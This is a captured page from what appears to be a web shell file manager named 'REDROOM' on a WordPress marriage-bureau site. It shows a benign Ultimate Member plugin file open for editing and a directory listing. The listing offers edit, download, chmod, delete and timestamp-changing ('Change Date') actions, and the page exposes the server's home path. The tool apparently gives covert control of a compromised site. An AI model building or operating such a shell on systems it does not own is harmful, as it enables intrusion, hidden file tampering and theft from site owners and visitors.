REDROOM
PHP 8.2.31
Path:
Logout
Edit File
Size: 807 B
Close
/home/nshryvcy/taramarriagebureau.com/wp-content/plugins/ultimate-member/includes/frontend/class-modal.php
Text
Base64
<?php namespace um\frontend; if ( ! defined( 'ABSPATH' ) ) { exit; } /** * Class Modal * * @package um\frontend */ class Modal { /** * Modal constructor. */ public function __construct() { add_action( 'wp_footer', array( &$this, 'load_modal_content' ), $this->get_priority() ); } /** * @return int */ private function get_priority() { return apply_filters( 'um_core_includes_modals_priority', 9 ); } /** * Load modal content. */ public function load_modal_content() { $modal_templates = glob( UM_PATH . 'templates/modal/*.php' ); $modal_templates = array_map( 'basename', $modal_templates ); if ( ! empty( $modal_templates ) ) { foreach ( $modal_templates as $modal_content ) { UM()->get_template( 'modal/' . $modal_content, '', array(), true ); } } } }
Save
Close
Exit & Reset
Text mode: syntax highlighting auto-detects file type.
Directory Contents
Dirs: 0 × Files: 7
Delete Selected
Select All
Select None
Sort:
Name
Size
Modified
Enable drag-to-move
Name
Size
Perms
Modified
Actions
class-actions-listener.php
6.84 KB
lrw-r--r--
2025-04-30 03:17:36
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
class-enqueue.php
10.48 KB
lrw-r--r--
2025-04-30 03:17:36
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
class-init.php
2.05 KB
lrw-r--r--
2025-04-30 03:17:36
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
class-modal.php
807 B
lrw-r--r--
2025-04-30 03:17:36
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
class-secure.php
8.48 KB
lrw-r--r--
2025-04-30 03:17:36
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
class-user-profile.php
1.44 KB
lrw-r--r--
2025-04-30 03:17:36
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
class-users.php
2.84 KB
lrw-r--r--
2025-04-30 03:17:36
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
Zip Selected
If ZipArchive is unavailable, a
.tar
will be created (no compression).